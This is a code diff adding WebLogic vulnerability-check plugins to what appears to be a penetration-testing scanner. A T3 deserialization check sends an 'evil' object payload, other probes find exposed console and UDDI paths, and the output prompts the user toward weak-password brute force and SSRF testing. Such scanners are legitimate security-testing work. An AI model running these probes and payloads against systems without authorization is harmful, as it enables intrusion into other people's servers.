 def checkVul(res,server_addr,index):
    p=re.findall(VER_SIG[index], res, re.S)
    if len(p)>0:
        # print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index])
        print(('[+]目标weblogic存在JAVA反序列化漏洞：{}'.format(VUL[index])))
    else:
        # print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index])
        # pass
        # print (u'目标weblogic未检测到：{}'.format(VUL[index]))
        print(('[-]目标weblogic未检测到{}'.format(VUL[index])))
 def run(dip,dport,index):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ##打了补丁之后，会阻塞，所以设置超时时间，默认15s，根据情况自己调整
    sock.settimeout(10)
    server_addr = (dip, dport)
    t3handshake(sock,server_addr)
    buildT3RequestObject(sock,dport)
    rs=sendEvilObjData(sock,PAYLOAD[index])
    #print 'rs',rs
    checkVul(rs,server_addr,index)
 if __name__=="__main__":
    # dip = sys.argv[1]
    # dport = int(sys.argv[2])
    # run(dip,dport,0)
    rip = '127.0.0.1'
    rport = 7001
    run(rip,rport,0)
--- a/plugins/weblogic_poc/init.py
+++ b/plugins/weblogic_poc/init.py
@@ -0,0 +1,10 @@
 #!/usr/bin/env python
 # _*_ coding:utf-8 _*_
 '''
 ____       _     _     _ _   __  __           _
 |  _ \ __ _| |__ | |__ (_) |_|  \/  | __ _ ___| | __
 | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
 |  _ < (_| | |_) | |_) | | |_| |  | | (_| \__ \   <
 |_| \_\__,_|_.__/|_.__/|_|\__|_|  |_|\__,_|___/_|\_\
 '''
--- a/plugins/weblogic_poc/pycache/CVE_2015_4852.cpython-37.pyc
+++ b/plugins/weblogic_poc/pycache/CVE_2015_4852.cpython-37.pyc
--- a/plugins/weblogic_poc/pycache/CVE_2016_0638.cpython-37.pyc
+++ b/plugins/weblogic_poc/pycache/CVE_2016_0638.cpython-37.pyc
--- a/plugins/weblogic_poc/pycache/CVE_2016_3510.cpython-37.pyc
+++ b/plugins/weblogic_poc/pycache/CVE_2016_3510.cpython-37.pyc
--- a/plugins/weblogic_poc/pycache/CVE_2017_3248.cpython-37.pyc
+++ b/plugins/weblogic_poc/pycache/CVE_2017_3248.cpython-37.pyc
--- a/plugins/weblogic_poc/pycache/CVE_2017_3506.cpython-37.pyc
+++ b/plugins/weblogic_poc/pycache/CVE_2017_3506.cpython-37.pyc
--- a/plugins/weblogic_poc/pycache/CVE_2018_2628.cpython-37.pyc
+++ b/plugins/weblogic_poc/pycache/CVE_2018_2628.cpython-37.pyc
--- a/plugins/weblogic_poc/pycache/CVE_2018_2893.cpython-37.pyc
+++ b/plugins/weblogic_poc/pycache/CVE_2018_2893.cpython-37.pyc
--- a/plugins/weblogic_poc/pycache/init.cpython-37.pyc
+++ b/plugins/weblogic_poc/pycache/init.cpython-37.pyc
--- a/plugins/weblogic_poc/pycache/managerURL200.cpython-37.pyc
+++ b/plugins/weblogic_poc/pycache/managerURL200.cpython-37.pyc
--- a/plugins/weblogic_poc/pycache/uddi_ssrf.cpython-37.pyc
+++ b/plugins/weblogic_poc/pycache/uddi_ssrf.cpython-37.pyc
--- a/plugins/weblogic_poc/managerURL200.py
+++ b/plugins/weblogic_poc/managerURL200.py
@@ -0,0 +1,32 @@
 #!/usr/bin/env python
 # _*_ coding:utf-8 _*_
 '''
 ____       _     _     _ _   __  __           _    
 |  _ \ __ _| |__ | |__ (_) |_|  \/  | __ _ ___| | __
 | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
 |  _ < (_| | |_) | |_) | | |_| |  | | (_| \__ \   < 
 |_| \_\__,_|_.__/|_.__/|_|\__|_|  |_|\__,_|___/_|\_\
 '''
 import sys
 import requests
 headers = {'user-agent': 'ceshi/0.0.1'}
 def islive(ur,port):
    url='http://' + str(ur)+':'+str(port)+'/console/login/LoginForm.jsp'
    r = requests.get(url, headers=headers)
    return r.status_code
 def run(url,port):
    if islive(url,port)==200:
        u='http://' + str(url)+':'+str(port)+'/console/login/LoginForm.jsp'
        print(("[+]目标weblogic控制台地址暴露!\n[+]路径为:{}\n[+]请自行尝试弱口令爆破!".format(u)))
    else:
        print("[-]目标weblogic控制台地址未找到!")
 if __name__=="__main__":
    url = sys.argv[1]
    port = int(sys.argv[2])
    run(url,port)
    # run('127.0.0.1',7001)
--- a/plugins/weblogic_poc/uddi_ssrf.py
+++ b/plugins/weblogic_poc/uddi_ssrf.py
@@ -0,0 +1,31 @@
 #!/usr/bin/env python
 # _*_ coding:utf-8 _*_
 '''
 ____       _     _     _ _   __  __           _    
 |  _ \ __ _| |__ | |__ (_) |_|  \/  | __ _ ___| | __
 | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
 |  _ < (_| | |_) | |_) | | |_| |  | | (_| \__ \   < 
 |_| \_\__,_|_.__/|_.__/|_|\__|_|  |_|\__,_|___/_|\_\
 '''
 import sys
 import requests
 headers = {'user-agent': 'ceshi/0.0.1'}
 def islive(ur,port):
    url='http://' + str(ur)+':'+str(port)+'/uddiexplorer/'
    r = requests.get(url, headers=headers)
    # print(url,r.status_code)
    return r.status_code
 def run(url,port):
    if islive(url,port)==200:
        print(('[+]目标weblogic存在UDDI组件!\n[+]路径为:{}\n[+]请自行验证SSRF漏洞!'.format('http://' + str(url)+':'+str(port)+'/uddiexplorer/')))
    else:
        print("[-]目标weblogic UDDI组件默认路径不存在!")
 if __name__=="__main__":
    url = sys.argv[1]
    port = int(sys.argv[2])
    run(url,port)
--- a/plugins/weblogic_special_plugin_.py
+++ b/plugins/weblogic_special_plugin_.py
@@ -0,0 +1,51 @@
 #coding=utf-8
 from plugins.weblogic_poc import CVE_2015_4852
 from plugins.weblogic_poc import CVE_2016_0638
 from plugins.weblogic_poc import CVE_2016_3510
 from plugins.weblogic_poc import CVE_2017_3248
 from plugins.weblogic_poc import CVE_2017_3506
 from plugins.weblogic_poc import CVE_2018_2628
 from plugins.weblogic_poc import CVE_2018_2893
 from plugins.weblogic_poc import managerURL200
 from plugins.weblogic_poc import uddi_ssrf
 import socket
 def weblogic_special_plugin_(arg,config):
    port=7001
    ip=socket.gethostbyname(arg.url.strip("http://").strip("https://"))
    #print(arg.url)
    try:
        CVE_2015_4852.run(ip,port)
    except Exception:
        print("CVE_2015_4852 脚本出错")
    try:
        CVE_2016_0638.run(ip,port,0)
    except Exception:
        print("CVE_2016_0638 脚本出错")
    try:
        CVE_2016_3510.run(ip,port,0)
    except Exception:
        print("CVE_2016_3510 脚本出错")
    try:
        CVE_2017_3248.run(ip,port,0)
    except Exception:
        print("CVE_2017_3248 脚本出错")
    try:
        CVE_2017_3506.run(ip,port)
    except Exception:
        print("CVE_2017_3506 脚本出错")
    try:
        CVE_2018_2893.run(ip,port,0)
    except Exception:
        print("CVE_2018_2893 脚本出错")
    try:
        CVE_2018_2628.run(ip,port,0)
    except Exception:
        print("CVE_2018_2628 脚本出错")
    try:
        managerURL200.run(ip,port)
    except Exception:
        print("managerURL200 脚本出错")
    try:
        uddi_ssrf.run(ip,port)
    except Exception:
        print("uddi_ssrf 脚本出错")